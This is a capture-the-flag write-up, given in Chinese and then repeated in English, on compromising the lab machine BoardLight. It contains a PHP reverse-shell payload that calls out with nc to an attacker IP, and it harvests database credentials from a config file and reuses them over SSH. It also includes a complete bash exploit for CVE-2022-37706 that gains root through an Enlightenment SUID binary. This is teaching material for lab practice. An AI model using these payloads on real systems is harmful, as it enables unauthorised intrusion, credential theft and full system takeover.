本文介绍了对BoardLight主机的渗透测试过程。首先,通过Nmap扫描确定开放的端口和服务,发现目标网站为board.htb,并通过目录爆破发现Dolibarr 17.0.0的漏洞CVE-2023-30253。利用admin:admin凭据成功登录后,通过一些命令获取数据库的用户名和密码。然后,使用larissa用户的SSH权限获得shell。接着,利用CVE-2022-37706进行特权升级,成功获得root权限。最后,总结了在渗透测试中的学习经验,强调了在发现数据库凭据后优先尝试SSH连接的重要性。 This article details the penetration testing process of the BoardLight host. First, Nmap scanning was used to identify open ports and services, revealing the target website as board.htb. Directory busting then uncovered the Dolibarr 17.0.0 vulnerability, CVE-2023-30253. After successfully logging in with the admin:admin credentials, commands were executed to retrieve database usernames and passwords. Next, SSH privileges of the user larissa were leveraged to obtain a shell. Subsequently, privilege escalation was achieved using CVE-2022-37706, successfully gaining root access. Finally, the learning experiences from the penetration test were summarized, emphasizing the importance of prioritizing SSH connection attempts after discovering database credentials.

Information Gathering

# Nmap 7.98 scan initiated Wed Dec 31 20:29:46 2025 as: /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.10.11.11
Nmap scan report for 10.10.11.11
Host is up (0.14s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA)
|   256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA)
|_  256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
Uptime guess: 42.763 days (since Wed Nov 19 02:11:48 2025)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Dec 31 20:30:03 2025 -- 1 IP address (1 host up) scanned in 16.57 seconds

Vulnerability Analysis

通过浏览网页获得主机名board.htb

因为web是静态的,寻找vhost

➜  BoardLight ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://board.htb/ -H "Host: FUZZ.board.htb" -fw 6243
crm                     [Status: 200, Size: 6360, Words: 397, Lines: 150, Duration: 268ms]

Dolibarr 17.0.0 → CVE-2023-30253

Exploitation (User Flag)

尝试凭据admin:admin可以进入

 

<?PHP system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.5 4444 > /tmp/f");?>

进入后

www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ ss -tln
State                       Recv-Q                      Send-Q                                           Local Address:Port                                            Peer Address:Port                     Process
LISTEN                      0                           70                                                   127.0.0.1:33060                                                0.0.0.0:*
LISTEN                      0                           128                                                    0.0.0.0:22                                                   0.0.0.0:*
LISTEN                      0                           4096                                             127.0.0.53%lo:53                                                   0.0.0.0:*
LISTEN                      0                           151                                                  127.0.0.1:3306                                                 0.0.0.0:*
LISTEN                      0                           511                                                          *:80                                                         *:*
# 数据库开放的
www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ less conf.php
$dolibarr_main_url_root='http://crm.board.htb';
$dolibarr_main_document_root='/var/www/html/crm.board.htb/htdocs';
$dolibarr_main_url_root_alt='/custom';
$dolibarr_main_document_root_alt='/var/www/html/crm.board.htb/htdocs/custom';
$dolibarr_main_data_root='/var/www/html/crm.board.htb/documents';
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';
$dolibarr_main_db_type='mysqli';
$dolibarr_main_db_character_set='utf8';
$dolibarr_main_db_collation='utf8_unicode_ci';
// Authentication settings
$dolibarr_main_authentication='dolibarr';

我们看到家目录含有larissa用户

尝试ssh连接

➜  BoardLight ssh larissa@board.htb
# 输入密码serverfun2$2023!!

即可得到shell

Privilege Escalation (Root Flag)

larissa@boardlight:~$ find / -perm -4000 2>/dev/null
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight
/usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset
larissa@boardlight:~$ enlightenment --version
Version: 0.23.1

根据搜索得到CVE-2022-37706

#!/bin/bash

echo "CVE-2022-37706"
echo "[*] Trying to find the vulnerable SUID file..."
echo "[*] This may take few seconds..."

file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
if [[ -z ${file} ]]
then
	echo "[-] Couldn't find the vulnerable SUID file..."
	echo "[*] Enlightenment should be installed on your system."
	exit 1
fi

echo "[+] Vulnerable SUID binary found!"
echo "[+] Trying to pop a root shell!"
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"

echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
echo "[+] Enjoy the root shell :)"
${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net
larissa@boardlight:/tmp$ bash exploit.sh
CVE-2022-37706
[*] Trying to find the vulnerable SUID file...
[*] This may take few seconds...
[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
[+] Enjoy the root shell :)
mount: /dev/../tmp/: can't find in /etc/fstab.
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),1000(larissa)

Lessons Learned

看到数据库账号密码应该先去尝试一下ssh,而不是直接进入数据库寻找hash

Information Gathering

# Nmap 7.98 scan initiated Wed Dec 31 20:29:46 2025 as: /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.10.11.11
Nmap scan report for 10.10.11.11
Host is up (0.14s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA)
|   256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA)
|_  256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
Uptime guess: 42.763 days (since Wed Nov 19 02:11:48 2025)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Dec 31 20:30:03 2025 -- 1 IP address (1 host up) scanned in 16.57 seconds

Vulnerability Analysis

Obtained the hostname board.htb by browsing the web page.

Because the web is static, looking for vhost.

➜  BoardLight ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://board.htb/ -H "Host: FUZZ.board.htb" -fw 6243
crm                     [Status: 200, Size: 6360, Words: 397, Lines: 150, Duration: 268ms]

Dolibarr 17.0.0 → CVE-2023-30253

Exploitation (User Flag)

Attempting credentials admin:admin allows entry.

 

<?PHP system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.5 4444 > /tmp/f");?>

After entering.

www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ ss -tln
State                       Recv-Q                      Send-Q                                           Local Address:Port                                            Peer Address:Port                     Process
LISTEN                      0                           70                                                   127.0.0.1:33060                                                0.0.0.0:*
LISTEN                      0                           128                                                    0.0.0.0:22                                                   0.0.0.0:*
LISTEN                      0                           4096                                             127.0.0.53%lo:53                                                   0.0.0.0:*
LISTEN                      0                           151                                                  127.0.0.1:3306                                                 0.0.0.0:*
LISTEN                      0                           511                                                          *:80                                                         *:*
# Database port open
www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ less conf.php
$dolibarr_main_url_root='http://crm.board.htb';
$dolibarr_main_document_root='/var/www/html/crm.board.htb/htdocs';
$dolibarr_main_url_root_alt='/custom';
$dolibarr_main_document_root_alt='/var/www/html/crm.board.htb/htdocs/custom';
$dolibarr_main_data_root='/var/www/html/crm.board.htb/documents';
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';
$dolibarr_main_db_type='mysqli';
$dolibarr_main_db_character_set='utf8';
$dolibarr_main_db_collation='utf8_unicode_ci';
// Authentication settings
$dolibarr_main_authentication='dolibarr';

We see that the home directory contains user larissa.

Attempt SSH connection.

➜  BoardLight ssh larissa@board.htb
# Enter password serverfun2$2023!!

Shell obtained.

Privilege Escalation (Root Flag)

larissa@boardlight:~$ find / -perm -4000 2>/dev/null
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight
/usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset
larissa@boardlight:~$ enlightenment --version
Version: 0.23.1

According to the search, obtained CVE-2022-37706.

#!/bin/bash

echo "CVE-2022-37706"
echo "[*] Trying to find the vulnerable SUID file..."
echo "[*] This may take few seconds..."

file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
if [[ -z ${file} ]]
then
	echo "[-] Couldn't find the vulnerable SUID file..."
	echo "[*] Enlightenment should be installed on your system."
	exit 1
fi

echo "[+] Vulnerable SUID binary found!"
echo "[+] Trying to pop a root shell!"
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"

echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
echo "[+] Enjoy the root shell :)"
${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net
larissa@boardlight:/tmp$ bash exploit.sh
CVE-2022-37706
[*] Trying to find the vulnerable SUID file...
[*] This may take few seconds...
[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
[+] Enjoy the root shell :)
mount: /dev/../tmp/: can't find in /etc/fstab.
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),1000(larissa)

Lessons Learned

Upon seeing the database username and password, one should first try SSH instead of directly accessing the database to find hashes.